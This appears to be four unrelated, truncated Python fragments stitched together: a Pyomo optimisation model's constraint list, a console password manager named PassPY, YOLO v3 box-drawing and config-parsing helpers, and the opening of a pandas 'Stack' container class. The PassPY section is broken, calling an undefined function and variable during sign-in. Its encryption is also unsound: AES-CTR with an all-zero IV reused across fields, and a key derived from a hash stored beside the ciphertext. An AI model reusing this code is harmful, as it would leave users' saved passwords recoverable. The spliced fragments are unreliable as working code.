m.c385 = Constraint(expr= - m.b59 + m.b424 <= 0)
m.c386 = Constraint(expr= - m.b59 + m.b425 <= 0)
m.c387 = Constraint(expr= - m.b59 + m.b426 <= 0)
m.c388 = Constraint(expr= - m.b59 + m.b427 <= 0)
m.c389 = Constraint(expr= - m.b59 + m.b428 <= 0)
m.c390 = Constraint(expr= - m.b59 + m.b429 <= 0)
m.c391 = Constraint(expr= - m.b59 + m.b430 <= 0)
m.c392 = Constraint(expr= - m.b59 + m.b431 <= 0)
m.c393 = Constraint(expr= - m.b59 + m.b432 <= 0)
m.c394 = Constraint(expr= - m.b59 + m.b433 <= 0)
m.c395 = Constraint(expr= - m.b59 + m.b434 <= 0)
m.c396 = Constraint(expr= - m.b59 + m.b435 <= 0)
m.c397 = Constraint(expr= - m.b59 + m.b436 <= 0)
m.c398 = Constraint(expr= - m.b59 + m.b437 <= 0)
m.c399 = Constraint(expr= - m.b59 + m.b438 <= 0)
m.c400 = Constraint(expr= - m.b59 + m.b439 <= 0)
m.c401 = Constraint(expr= - m.b59 + m.b440 <= 0)
m.c402 = Constraint(expr= - m.b60 + m.b441 <= 0)
m.c403 = Constraint(expr= - m.b60 + m.b442 <= 0)
m.c404 = Constraint(expr= - m.b60 + m.b443 <= 0)
m.c405 = Constraint(expr= - m.b60 + m.b444 <= 0)
m.c406 = Constraint(expr= - m.b60 + m.b445 <= 0)
m.c407 = Constraint(expr= - m.b60 + m.b446 <= 0)
m.c408 = Constraint(expr= - m.b60 + m.b447 <= 0)
m.c409 = Constraint(expr= - m.b60 + m.b448 <= 0)
m.c410 = Constraint(expr= - m.b60 + m.b449 <= 0)
m.c411 = Constraint(expr= - m.b60 + m.b450 <= 0)
m.c412 = Constraint(expr= - m.b60 + m.b451 <= 0)
m.c413 = Constraint(expr= - m.b60 + m.b452 <= 0)
m.c414 = Constraint(expr= - m.b60 + m.b453 <= 0)
m.c415 = Constraint(expr= - m.b60 + m.b454 <= 0)
m.c416 = Constraint(expr= - m.b60 + m.b455 <= 0)
m.c417 = Constraint(expr= - m.b60 + m.b456 <= 0)
m.c418 = Constraint(expr= - m.b60 + m.b457 <= 0)
m.c419 = Constraint(expr= - m.b60 + m.b458 <= 0)
m.c420 = Constraint(expr= - m.b60 + m.b459 <= 0)
m.c421 = Constraint(expr= - m.b60 + m.b460 <= 0)
m.c422 = Constraint(expr= m.b61 + m.b81 + m.b101 + m.b121 + m.b141 + m.b161 + m.b181 + m.b201 + m.b221 + m.b241
+ m.b261 + m.b281 + m.b301 + m.b321 + m.b341 + m.b361 + m.b381 + m.b401 + m.b421 + m.b441
== 1)
m.c423 = Constraint(expr= m.b62 + m.b82 + m.b102 + m.b122 + m.b142 + m.b162 + m.b182 + m.b202 + m.b222 + m.b242
+ m.b262 + m.b282 + m.b302 + m.b322 + m.b342 + m.b362 + m.b382 + m.b402 + m.b422 + m.b442
== 1)
m.c424 = Constraint(expr= m.b63 + m.b83 + m.b103 + m.b123 + m.b143 + m.b163 + m.b183 + m.b203 + m.b223 + m.b243
+ m.b263 + m.b283 + m.b303 + m.b323 + m.b343 + m.b363 + m.b383 + m.b403 + m.b423 + m.b443
== 1)
m.c425 = Constraint(expr= m.b64 + m.b84 + m.b104 + m.b124 + m.b144 + m.b164 + m.b184 + m.b204 + m.b224 + m.b244
+ m.b264 + m.b284 + m.b304 + m.b324 + m.b344 + m.b364 + m.b384 + m.b404 + m.b424 + m.b444
== 1)
m.c426 = Constraint(expr= m.b65 + m.b85 + m.b105 + m.b125 + m.b145 + m.b165 + m.b185 + m.b205 + m.b225 + m.b245
+ m.b265 + m.b285 + m.b305 + m.b325 + m.b345 + m.b365 + m.b385 + m.b405 + m.b425 + m.b445
== 1)
m.c427 = Constraint(expr= m.b66 + m.b86 + m.b106 + m.b126 + m.b146 + m.b166 + m.b186 + m.b206 + m.b226 + m.b246
+ m.b266 + m.b286 + m.b306 + m.b326 + m.b346 + m.b366 + m.b386 + m.b406 + m.b426 + m.b446
== 1)
m.c428 = Constraint(expr= m.b67 + m.b87 + m.b107 + m.b127 + m.b147 + m.b167 + m.b187 + m.b207 + m.b227 + m.b247
+ m.b267 + m.b287 + m.b307 + m.b327 + m.b347 + m.b367 + m.b387 + m.b407 + m.b427 + m.b447
== 1)
m.c429 = Constraint(expr= m.b68 + m.b88 + m.b108 + m.b128 + m.b148 + m.b168 + m.b188 + m.b208 + m.b228 + m.b248
+ m.b268 + m.b288 + m.b308 + m.b328 + m.b348 + m.b368 + m.b388 + m.b408 + m.b428 + m.b448
== 1)
m.c430 = Constraint(expr= m.b69 + m.b89 + m.b109 + m.b129 + m.b149 + m.b169 + m.b189 + m.b209 + m.b229 + m.b249
+ m.b269 + m.b289 + m.b309 + m.b329 + m.b349 + m.b369 + m.b389 + m.b409 + m.b429 + m.b449
== 1)
m.c431 = Constraint(expr= m.b70 + m.b90 + m.b110 + m.b130 + m.b150 + m.b170 + m.b190 + m.b210 + m.b230 + m.b250
+ m.b270 + m.b290 + m.b310 + m.b330 + m.b350 + m.b370 + m.b390 + m.b410 + m.b430 + m.b450
== 1)
m.c432 = Constraint(expr= m.b71 + m.b91 + m.b111 + m.b131 + m.b151 + m.b171 + m.b191 + m.b211 + m.b231 + m.b251
+ m.b271 + m.b291 + m.b311 + m.b331 + m.b351 + m.b371 + m.b391 + m.b411 + m.b431 + m.b451
== 1)
m.c433 = Constraint(expr= m.b72 + m.b92 + m.b112 + m.b132 + m.b152 + m.b172 + m.b192 + m.b212 + m.b232 + m.b252
+ m.b272 + m.b292 + m.b312 + m.b332 + m.b352 + m.b372 + m.b392 + m.b412 + m.b432 + m.b452
== 1)
m.c434 = Constraint(expr= m.b73 + m.b93 + m.b113 + m.b133 + m.b153 + m.b173 + m.b193 + m.b213 + m.b233 + m.b253
+ m.b273 + m.b293 + m.b313 + m.b333 + m.b353 + m.b373 + m.b393 + m.b413 + m.b433 + m.b453
== 1)
m.c435 = Constraint(expr= m.b74 + m.b94 + m.b114 + m.b134 + m.b154 + m.b174 + m.b194 + m.b214 + m.b234 + m.b254
+ m.b274 + m.b294 + m.b314 + m.b334 + m.b354 + m.b374 + m.b394 + m.b414 + m.b434 + m.b454
== 1)
m.c436 = Constraint(expr= m.b75 + m.b95 + m.b115 + m.b135 + m.b155 + m.b175 + m.b195 + m.b215 + m.b235 + m.b255
+ m.b275 + m.b295 + m.b315 + m.b335 + m.b355 + m.b375 + m.b395 + m.b415 + m.b435 + m.b455
== 1)
m.c437 = Constraint(expr= m.b76 + m.b96 + m.b116 + m.b136 + m.b156 + m.b176 + m.b196 + m.b216 + m.b236 + m.b256
+ m.b276 + m.b296 + m.b316 + m.b336 + m.b356 + m.b376 + m.b396 + m.b416 + m.b436 + m.b456
== 1)
m.c438 = Constraint(expr= m.b77 + m.b97 + m.b117 + m.b137 + m.b157 + m.b177 + m.b197 + m.b217 + m.b237 + m.b257
+ m.b277 + m.b297 + m.b317 + m.b337 + m.b357 + m.b377 + m.b397 + m.b417 + m.b437 + m.b457
== 1)
m.c439 = Constraint(expr= m.b78 + m.b98 + m.b118 + m.b138 + m.b158 + m.b178 + m.b198 + m.b218 + m.b238 + m.b258
+ m.b278 + m.b298 + m.b318 + m.b338 + m.b358 + m.b378 + m.b398 + m.b418 + m.b438 + m.b458
== 1)
m.c440 = Constraint(expr= m.b79 + m.b99 + m.b119 + m.b139 + m.b159 + m.b179 + m.b199 + m.b219 + m.b239 + m.b259
+ m.b279 + m.b299 + m.b319 + m.b339 + m.b359 + m.b379 + m.b399 + m.b419 + m.b439 + m.b459
== 1)
m.c441 = Constraint(expr= m.b80 + m.b100 + m.b120 + m.b140 + m.b160 + m.b180 + m.b200 + m.b220 + m.b240 | |
import codecs
import os
import os.path
import string
import random
from random import shuffle
import csv
import time
import hashlib
import struct
import binascii
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
DefaultSize = "mode con: cols=100 lines=20"
os.system(DefaultSize)
pre = "C:\ProgramData\PassPY"
if not os.path.exists(pre):
os.makedirs(pre)
account = ""
cypher = ""
username = ""
user_name = ""
m = ""
def clrscr():
# Check if Operating System is Mac and Linux or Windows
if os.name == 'posix':
_ = os.system('clear')
else:
# Else Operating System is Windows (os.name = nt)
_ = os.system('cls')
def logo():
print("________ __________ __\n___ __ \_____ _________________ __ \ \/ /\n__ /_/ / __ `/_ ___/_ ___/_ /_/ /_ / \n_ ____// /_/ /_(__ )_(__ )_ ____/_ / \n/_/ \__,_/ /____/ /____/ /_/ /_/ \n\n\n\n\n")
def header():
clrscr()
os.system(DefaultSize)
logo()
def PassGen(user_name,acc,uN,pre):
header()
x = ''
x = input("1: Have PassPY generate a password with a length you choose for " + acc + "\n2: Type your own password for " + acc + "\n")
if x == '1':
header()
length = float(input("How many characters would you like the password to be for " + acc + "? \n"))
div = int(length/3)
r = int(length%3)
seed = string.ascii_letters # Generating letters
letters = ( ''. join(random.choice(seed) for i in range(div)) )
seed = string.digits # generating digits
numbers = ( ''.join(random.choice(seed) for i in range(div)) )
seed = string.punctuation # generating punctuation
punctuation = ( ''.join(random.choice(seed) for i in range(div + r)) )
hold = letters + numbers + punctuation
pW = ( ''.join(random.sample(hold, len(hold))))
print("here is the generated password: " + pW)
preKey = acc + uN + pW
lineHash = hashlib.sha256(preKey.encode('utf-8'))
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
lineHashHexidecimal = lineHash.hexdigest()
smosh = hashlib.sha256(bytes(half + lineHashHexidecimal, 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
acc = bytes(acc, 'utf8')
uN = bytes(uN, 'utf8')
pW = bytes(pW, 'utf8')
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
encryptor = cipher.encryptor()
uN = encryptor.update(uN) + encryptor.finalize()
uN = bytes.hex(uN)
encryptor = cipher.encryptor()
acc = encryptor.update(acc) + encryptor.finalize()
acc = bytes.hex(acc)
encryptor = cipher.encryptor()
pW = encryptor.update(pW) + encryptor.finalize()
pW = bytes.hex(pW)
lineEncrypted = bytes(acc + uN + pW, 'utf8')
lineChecksum = hashlib.sha256(lineEncrypted).hexdigest()
newline = acc + "\t" + uN + "\t" + pW + "\t" + str(lineHashHexidecimal) + "\t" + str(lineChecksum) + "\n"
post = user_name + "50" + ".passpy"
location = os.path.join(pre, post)
with open(location, "a", newline="\n") as filea:
filea.write(newline + "\n")
input("press Enter once the password is memorized (dont worry if you forget, it was saved in your password directory.)\n")
MainMenu(user_name)
elif x == '2':
header()
pW = input("Type the password for " + acc + ", then press Enter: \n")
preKey = acc + uN + pW
lineHash = hashlib.sha256(preKey.encode('utf-8'))
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
lineHashHexidecimal = lineHash.hexdigest()
smosh = hashlib.sha256(bytes(half + lineHashHexidecimal, 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
acc = bytes(acc, 'utf8')
uN = bytes(uN, 'utf8')
pW = bytes(pW, 'utf8')
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
smosh = ''
key = ''
iv = ''
encryptor = cipher.encryptor()
uN = encryptor.update(uN) + encryptor.finalize()
uN = bytes.hex(uN)
encryptor = cipher.encryptor()
acc = encryptor.update(acc) + encryptor.finalize()
acc = bytes.hex(acc)
encryptor = cipher.encryptor()
pW = encryptor.update(pW) + encryptor.finalize()
pW = bytes.hex(pW)
lineEncrypted = bytes(acc + uN + pW, 'utf8')
lineChecksum = hashlib.sha256(lineEncrypted).hexdigest()
newline = acc + "\t" + uN + "\t" + pW + "\t" + str(lineHashHexidecimal) + "\t" + str(lineChecksum) + "\n"
post = user_name + "50" + ".passpy"
location = os.path.join(pre, post)
with open(location, "a", newline="\n") as filea:
filea.write(newline)
MainMenu(user_name)
else:
PassGen(user_name,acc,uN,pre)
def Signin(pre):
header()
user_name = input("Enter Username: ").encode("utf-8").hex()
if user_name == "":
input("Press enter to returnt to the Sign In screen and enter a user name\n")
Signin(pre)
nametest2 = user_name + "4c" + ".passpy"
location = os.path.join(pre, nametest2)
try: #check to see if the account exists
usersearch = open(location,"r") #search for user's password file
lst = list(usersearch.readlines())
confirm = lst[-1]
print("Hello " + str(codecs.decode(user_name, "hex"), "utf-8"))
password = input("Enter Password: ").encode("utf-8").hex()
s(user_name,password)
compare = line
if compare == confirm:
print("Access Granted")
MainMenu(user_name)
else:
print("Access Denied")
Signin(pre)
except FileNotFoundError:
header()
print("Username not found!")
input("please press enter to continue")
Login(pre)
def AddEntry(user_name,pre):
header()
acc = input("what account is this password for? (e.g. GitHub)\n")
uN = input("What is the username for " + acc + "?\n")
PassGen(user_name,acc,uN,pre)
print("Done!")
def PasswordSearch(user_name,pre):
c = ""
header()
post = user_name + "50" + ".passpy"
location = os.path.join(pre, post)
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
SearchColumn = input("Password Search Menu:\nPress 1 to show all passwords\nPress 2 to search by account\nAll of the following options will NOT work!\nPress 3 to search by username\nPress 4 to search by password\nPress 5 to return to the Main Menu\n ")
try: #make sure there is a password file to search through
with open(location) as csv_file:
csv_reader = csv.reader(csv_file, delimiter="\t")
next(csv_reader)
if SearchColumn == '1':
header()
print("Here are all of the stored passwords: ")
for row in csv_reader: # !!!START HERE!!! Decrypt single item line by line
smosh = hashlib.sha256(bytes(half + str(row[3]), 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
decryptor = cipher.decryptor()
bEntry = bytes.fromhex(str(row[2]).lower())
bct = str(decryptor.update(bEntry), "utf8")
print(bct)
input("Press Enter to continue to the Main Menu")
MainMenu(user_name)
elif SearchColumn == '2':
header()
search = bytes(input("What Account are you looking for? \n"), 'utf8')
for row in csv_reader:
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
smosh = hashlib.sha256(bytes(half + str(row[3]), 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
decryptor = cipher.decryptor()
encryptor = cipher.encryptor()
sup = encryptor.update(search) + encryptor.finalize()
sable = bytes.hex(sup)
if sable == row[0]:
decryptor = cipher.decryptor()
a = bytes.fromhex(str(row[0]).lower())
a = str(decryptor.update(a), "utf8")
decryptor = cipher.decryptor()
u = bytes.fromhex(str(row[1]).lower())
u = str(decryptor.update(u), "utf8")
decryptor = cipher.decryptor()
p = bytes.fromhex(str(row[2]).lower())
p = str(decryptor.update(p), "utf8")
header()
c = input("The Account, Username and Password information for " + a + " are:\n\nAccount------" + a + "\nUser Name----" + u + "\nPassword-----" + p + "\n\nEnter 1 if you want to copy the password to the clipboard\nEnter 2 if you want to continue searching\n")
if c == '1':
target = p
header()
print("The Account, Username and Password information for " + a + " are:\n\nAccount------" + a + "\nUser Name----" + u + "\nPassword-----" + p + "\n")
Clipboard(target)
MainMenu(user_name)
elif c == '2':
print("Password NOT copied, continuing to search")
time.sleep(2)
continue
else:
print("Returning to the Main Menu")
time.sleep(1)
MainMenu(user_name)
MainMenu(user_name)
elif SearchColumn == '3':
header()
search = bytes(input("What Username are you looking for? \n"), 'utf8')
for row in csv_reader:
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
smosh = hashlib.sha256(bytes(half + str(row[3]), 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
decryptor = cipher.decryptor()
encryptor = cipher.encryptor()
sup = encryptor.update(search) + encryptor.finalize()
sable = bytes.hex(sup)
if sable == row[1]:
decryptor = cipher.decryptor()
a = bytes.fromhex(str(row[0]).lower())
a = str(decryptor.update(a), "utf8")
decryptor = cipher.decryptor()
u = bytes.fromhex(str(row[1]).lower())
u = str(decryptor.update(u), "utf8")
decryptor = cipher.decryptor()
p = bytes.fromhex(str(row[2]).lower())
p = str(decryptor.update(p), "utf8")
header()
c = input("The Account, Username and Password information for " + a + " are:\n\nAccount------" + a + "\nUser Name----" + u + "\nPassword-----" + p + "\n\nEnter 1 if you want to copy the password to the clipboard\nEnter 2 if you do not\n")
if c == '1':
target = p
header()
print("The Account, Username and Password information for " + a + " are:\n\nAccount------" + a + "\nUser Name----" + u + "\nPassword-----" + p + "\n")
Clipboard(target)
MainMenu(user_name)
elif c == '2':
input("Password NOT copied, Press enter to return to continue searching")
continue
else:
input("Password NOT copied, Press enter to return to the Main Menu")
MainMenu(user_name)
continue
MainMenu(user_name)
elif SearchColumn == '4':
header()
search = bytes(input("What password are you looking for? \n"), 'utf8')
for row in csv_reader:
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
smosh = hashlib.sha256(bytes(half + str(row[3]), 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
decryptor = cipher.decryptor()
encryptor = cipher.encryptor()
sup = encryptor.update(search) + encryptor.finalize()
sable = bytes.hex(sup)
if sable == row[2]:
decryptor = cipher.decryptor()
a = bytes.fromhex(str(row[0]).lower())
a = str(decryptor.update(a), "utf8")
decryptor = cipher.decryptor()
u = | |
from __future__ import division
import torch
import math
import argparse
import time
from torch.autograd import Variable
from PIL import ImageDraw
def detect_arg_parse():
"""
Parse arguments to the detect module.
:return: parser.parse_args()
"""
parser = argparse.ArgumentParser(description='YOLO v3 Detection Module')
arg = parser.add_argument
arg('--images', dest='images', help='Image / Directory containing images need to be detected',
default='data/images/dog.jpg', type=str)
arg('--det', dest='det', help='Image / Directory to store the detection result.',
default='data/results/predict.jpg', type=str)
arg('--batch_size', dest='batch_size', default=1)
arg('--confidence', dest='confidence', help='The lowest confidence to perform a detection', default=0.5)
arg('--nms_thresh', dest='nms_thresh', help='NMS Threshold', default=0.4)
arg('--cfg', dest='cfgfile', help='Model configuration file', default='data/cfg/yolov3.cfg', type=str)
arg('--weights', dest='weightsfile', help='Model weights file', default='data/weights/yolov3.weights', type=str)
arg('--reso', dest='reso', help='Input resolution of the model.', default='416', type=str)
arg('--scales', dest='scales', help='Scales to use for detection', default='1,2,3', type=str)
arg('--gpu', dest='gpu', help='Number of the gpu you want to use', default=-1, type=int)
arg('--name_file', dest='name_file', help='The file of class names', default='data/names/coco.names', type=str)
return parser.parse_args()
def load_class_names(namesfile):
class_names = []
with open(namesfile, 'r') as fp:
lines = fp.readlines()
for line in lines:
line = line.rstrip()
class_names.append(line)
return class_names
def plot_boxes(img, boxes, save_name=None, class_names=None):
colors = torch.FloatTensor([[1, 0, 1], [0, 0, 1], [0, 1, 1], [0, 1, 0], [1, 1, 0], [1, 0, 0]])
def get_color(c, x, max_val):
ratio = float(x) / max_val * 5
i = int(math.floor(ratio))
j = int(math.ceil(ratio))
ratio = ratio - i
r = (1 - ratio) * colors[i][c] + ratio * colors[j][c]
return int(r * 255)
width = img.width
height = img.height
draw = ImageDraw.Draw(img)
for box in boxes:
# !!!!!!!!!!!!!!!!!!!!!!!!!!!
x1 = (box[0] - box[2] / 2.0) * width
y1 = (box[1] - box[3] / 2.0) * height
x2 = (box[0] + box[2] / 2.0) * width
y2 = (box[1] + box[3] / 2.0) * height
rgb = (255, 0, 0)
if len(box) == 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%s: %f' % (class_names[cls_id], cls_conf))
classes = len(class_names)
# !!!!!!!!!!!!!!!!!!!!
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes)
green = get_color(1, offset, classes)
blue = get_color(0, offset, classes)
rgb = (red, green, blue)
draw.text((x1, y1), class_names[cls_id], fill=rgb)
draw.rectangle([x1, y1, x2, y2], outline=rgb)
if save_name:
print('save plt results to %s' % save_name)
img.save(save_name)
return img
def nms(boxes, nms_thresh):
if len(boxes) == 0:
return boxes
det_confs = torch.zeros(len(boxes))
for idx, box in enumerate(boxes):
det_confs[idx] = 1 - box[4]
_, sortIds = torch.sort(det_confs)
out_boxes = []
for idx, box in enumerate(boxes):
box_i = boxes[sortIds[idx]]
if box_i[4] > 0:
out_boxes.append(box_i)
for j in range(idx + 1, len(boxes)):
box_j = boxes[sortIds[j]]
if bbox_iou(box_i, box_j, x1y1x2y2=False) > nms_thresh:
box_j[4] = 0
return out_boxes
def bbox_iou(box1, box2, x1y1x2y2=True):
if x1y1x2y2:
mx = min(box1[0], box2[0])
Mx = max(box1[2], box2[2])
my = min(box1[1], box2[1])
My = max(box1[3], box2[3])
w1 = box1[2] - box1[0]
h1 = box1[3] - box1[1]
w2 = box2[2] - box2[0]
h2 = box2[3] - box2[1]
else:
mx = min(box1[0]-box1[2]/2.0, box2[0]-box2[2]/2.0)
Mx = max(box1[0]+box1[2]/2.0, box2[0]+box2[2]/2.0)
my = min(box1[1]-box1[3]/2.0, box2[1]-box2[3]/2.0)
My = max(box1[1]+box1[3]/2.0, box2[1]+box2[3]/2.0)
w1 = box1[2]
h1 = box1[3]
w2 = box2[2]
h2 = box2[3]
uw = Mx - mx
uh = My - my
cw = w1 + w2 - uw
ch = h1 + h2 - uh
if cw <= 0 or ch <= 0:
return 0.0
area1 = w1 * h1
area2 = w2 * h2
carea = cw * ch
uarea = area1 + area2 - carea
return carea / uarea
def bbox_ious(boxes1, boxes2, x1y1x2y2=True):
if x1y1x2y2:
mx = torch.min(boxes1[0], boxes2[0])
Mx = torch.max(boxes1[2], boxes2[2])
my = torch.min(boxes1[1], boxes2[1])
My = torch.max(boxes1[3], boxes2[3])
w1 = boxes1[2] - boxes1[0]
h1 = boxes1[3] - boxes1[1]
w2 = boxes2[2] - boxes2[0]
h2 = boxes2[3] - boxes2[1]
else:
mx = torch.min(boxes1[0]-boxes1[2]/2.0, boxes2[0]-boxes2[2]/2.0)
Mx = torch.max(boxes1[0]+boxes1[2]/2.0, boxes2[0]+boxes2[2]/2.0)
my = torch.min(boxes1[1]-boxes1[3]/2.0, boxes2[1]-boxes2[3]/2.0)
My = torch.max(boxes1[1]+boxes1[3]/2.0, boxes2[1]+boxes2[3]/2.0)
w1 = boxes1[2]
h1 = boxes1[3]
w2 = boxes2[2]
h2 = boxes2[3]
uw = Mx - mx
uh = My - my
cw = w1 + w2 - uw
ch = h1 + h2 - uh
mask = ((cw <= 0) + (ch <= 0) > 0)
area1 = w1 * h1
area2 = w2 * h2
carea = cw * ch
carea[mask] = 0
uarea = area1 + area2 - carea
return carea/uarea
def parse_cfg(cfgfile):
blocks = []
fp = open(cfgfile)
block = None
for line in fp.readlines():
line = line.rstrip()
if line == '' or line[0] == '#':
continue
elif line[0] == '[':
if block:
blocks.append(block)
block = dict()
block['type'] = line.lstrip('[').rstrip(']')
if block['type'] == 'convolutional':
block['batch_normalize'] = 0
else:
key, value = line.split('=')
key = key.strip()
if key == 'type':
key = '_type'
value = value.strip()
block[key] = value
if block:
blocks.append(block)
fp.close()
return blocks
def print_cfg(blocks):
print('layer filters size input output');
prev_width = 416
prev_height = 416
prev_filters = 3
out_filters =[]
out_widths =[]
out_heights =[]
ind = -2
for block in blocks:
ind = ind + 1
if block['type'] == 'net':
prev_width = int(block['width'])
prev_height = int(block['height'])
continue
elif block['type'] == 'convolutional':
filters = int(block['filters'])
kernel_size = int(block['size'])
stride = int(block['stride'])
is_pad = int(block['pad'])
pad = (kernel_size-1)/2 if is_pad else 0
width = (prev_width + 2*pad - kernel_size)/stride + 1
height = (prev_height + 2*pad - kernel_size)/stride + 1
print('%5d %-6s %4d %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'conv', filters, kernel_size, kernel_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = int(width)
prev_height = int(height)
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'maxpool':
pool_size = int(block['size'])
stride = int(block['stride'])
width = prev_width/stride
height = prev_height/stride
print('%5d %-6s %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'max', pool_size, pool_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'avgpool':
width = 1
height = 1
print('%5d %-6s %3d x %3d x%4d -> %3d' % (ind, 'avg', prev_width, prev_height, prev_filters, prev_filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'softmax':
print('%5d %-6s -> %3d' % (ind, 'softmax', prev_filters))
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'cost':
print('%5d %-6s -> %3d' % (ind, 'cost', prev_filters))
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'reorg':
stride = int(block['stride'])
filters = stride * stride * prev_filters
width = prev_width/stride
height = prev_height/stride
print('%5d %-6s / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'reorg', stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'upsample':
stride = int(block['stride'])
filters = prev_filters
width = prev_width*stride
height = prev_height*stride
print('%5d %-6s * %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'upsample', stride, prev_width, prev_height, prev_filters, width, height, filters))
prev_width = width
prev_height = height
prev_filters = filters
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'route':
layers = block['layers'].split(',')
layers = [int(i) if int(i) > 0 else int(i)+ind for i in layers]
if len(layers) == 1:
print('%5d %-6s %d' % (ind, 'route', layers[0]))
prev_width = out_widths[layers[0]]
prev_height = out_heights[layers[0]]
prev_filters = out_filters[layers[0]]
elif len(layers) == 2:
print('%5d %-6s %d %d' % (ind, 'route', layers[0], layers[1]))
prev_width = out_widths[layers[0]]
prev_height = out_heights[layers[0]]
assert(prev_width == out_widths[layers[1]])
assert(prev_height == out_heights[layers[1]])
prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] in ['region', 'yolo']:
print('%5d %-6s' % (ind, 'detection'))
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'shortcut':
from_id = int(block['from'])
from_id = from_id if from_id > 0 else from_id+ind
print('%5d %-6s %d' % (ind, 'shortcut', from_id))
prev_width = out_widths[from_id]
prev_height = out_heights[from_id]
prev_filters = out_filters[from_id]
out_widths.append(prev_width)
out_heights.append(prev_height)
out_filters.append(prev_filters)
elif block['type'] == 'connected':
filters = int(block['output'])
print('%5d %-6s %d -> %3d' % (ind, 'connected', prev_filters, filters))
prev_filters = filters
out_widths.append(1)
out_heights.append(1)
out_filters.append(prev_filters)
else:
print('unknown type %s' % (block['type']))
def load_conv(buf, start, conv_model):
num_w = conv_model.weight.numel()
num_b = conv_model.bias.numel()
conv_model.bias.data.copy_(torch.from_numpy(buf[start:start+num_b])); start = start + num_b
# conv_model.weight.data.copy_(torch.from_numpy(buf[start:start+num_w])); start = start + num_w
conv_model.weight.data.copy_(torch.reshape(torch.from_numpy(buf[start:start + num_w]),
(conv_model.weight.shape[0],
conv_model.weight.shape[1],
conv_model.weight.shape[2],
conv_model.weight.shape[3])));
start = start + num_w
return start
def | |
<gh_stars>10-100
""" Storage class for sets of pandas object. Similar to a panel,
but does inherently store 3d data. Data can be converted to 3d through
methods, but otherwise is just a container."""
from collections import OrderedDict, Iterable
from copy import deepcopy
import logging
from skspec.logger import logclass
from skspec.plotting.multiplots import slice_plot
import skspec.core.utilities as put
logger = logging.getLogger(__name__)
class MultiError(Exception):
""" """
def mem_address(obj):
""" Return memory address string for a python object. Object must have
default python object __repr__ (ie it would look something like:
<pyparty.tools.grids.CartesianGrid object at 0x3ba2fb0>
The address is merely returned by string parsing. """
try:
out = obj.__repr__().split()[-1]
except Exception as E:
raise Exception("Failed to return memory address by string parsing. "
"Recieved following message: %s" % E.message)
else:
return out.strip("'").strip('>')
@logclass(log_name=__name__, public_lvl='debug')
class Stack(object):
""" Base class to store pandas objects, with special operations to
return as 3d data (eg panel) and to apply functions itemwise. Items are
stored in an ordered dict."""
itemlabel = 'Item'
_magic=['__len__',
'__iter__',
'__reversed__',
'__contains__',
]
def __init__(self, data, keys=None, name='', sort_items=False):
self.name = name
# Dictionary input
if isinstance(data, dict):
logger.debug('Initializing "%s" from dictionary.' % self.full_name)
if sort_items:
logger.debug('Sorting keys')
self._data=OrderedDict(sorted(data.keys(), key=lambda t: t[0]))
else:
self._data=OrderedDict(data)
else:
if not isinstance(data, Iterable):
logger.info('%s constructed from non-iterable... converting '
'data to an iterable' % self.full_name)
data=[data]
if keys:
if not isinstance(keys, Iterable):
logger.info('%s constructed from non-iterable... converting '
'keys to an iterable' % self.full_name)
keys = [keys]
if len(keys) != len(data):
raise ValueError('Length mistmatch: keys and data (%s,%s)'\
% (len(keys), len(data)))
# If keys not passed, generate them
else:
# Zipped data ((key, df), (key, df))
try:
keys, data = zip(*data)
except Exception:
keys=self._gen_keys(len(data))
if len(keys) > 1:
logger.warn("Generating keys %s-%s" % (keys[0], keys[-1]))
else:
logger.warn("Generating key %s" % keys[0])
self._data=OrderedDict( [ (key, data[i]) for (i, key)
in enumerate(keys) ])
@property
def _address(self):
""" Property to make easily accesible by multicanvas """
return mem_address(super(Stack, self).__repr__())
def _gen_keys(self, length):
""" Return a list of itemlables (item0, item1 etc...) using
self.itemlabel and a length"""
logger.debug('Items not found on %s: generating item list' % self.full_name)
return [self.itemlabel+str(i) for i in range(length)]
# --------------------
# Dictionary Interface
